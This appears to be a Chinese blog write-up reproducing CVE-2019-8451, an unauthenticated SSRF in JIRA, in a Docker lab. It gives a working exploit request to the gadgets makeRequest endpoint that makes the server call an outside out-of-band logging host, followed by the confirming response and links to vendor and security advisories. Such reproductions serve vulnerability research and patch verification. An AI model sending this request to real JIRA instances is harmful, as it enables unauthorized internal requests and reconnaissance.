Contents
CVE-2019-8451 JIRA Pre-auth SSRF
<!–more–>
正文
sudo docker pull cptactionhank/atlassian-jira:7.8.0
sudo docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0
注册一个 JIRA 账户,申请试用 lisence,开启 JIRA 实例。
HTTP 请求与响应示例
请求
GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@test101.ff16ff.ceye.io HTTP/1.1
Host: 192.168.198.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.133:8080/secure/Dashboard.jspa
X-Atlassian-Token: no-check
Content-Length: 2
响应
HTTP/1.1 200
X-AREQUESTID: 172x457x1
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-ASEN: SEN-L14282675
Set-Cookie: atlassian.xsrf.token=B2L1-IO15-0P99-DWSS|699ce9c269774813a6f837edde256b2f558aa50f|lout;path=/
X-AUSERNAME: anonymous
Expires: Wed, 25 Sep 2019 03:52:30 GMT
Cache-Control: public,max-age=3600
Content-Disposition: attachment;filename=p.txt
Vary: User-Agent
Content-Type: application/json;charset=UTF-8
Content-Length: 313
Date: Wed, 25 Sep 2019 02:52:30 GMT
Connection: close
throw 1; < don't be evil' >{"http://192.168.198.133:8080@test101.ff16ff.ceye.io":{"rc":200,"headers":{"set-cookie":["ceye.session=c15808138a284e3b870712ec9fea6254; Domain=.ceye.io; expires=Wed, 25-Sep-2019 04:52:29 GMT; Path=/"]},"body":"{\"meta\": {\"code\": 201, \"message\": \"HTTP Record Insert Success\"}}"}}
参考资料
https://jira.atlassian.com/browse/JRASERVER-69793
长亭
https://github.com/chaitin/xray/pull/438/commits/e837b0080cb03b813ea0e135bff3e2f2419182a1
[漏洞预警]CVE-2019-8451/Jira未授权SSRF漏洞 – 亚信
https://mp.weixin.qq.com/s/MVDA2Ocz89dWu1-IbIZ0Mg
【漏洞分析】Jira未授权SSRF漏洞(CVE-2019-8451) – 奇安信
https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A
Leave a Reply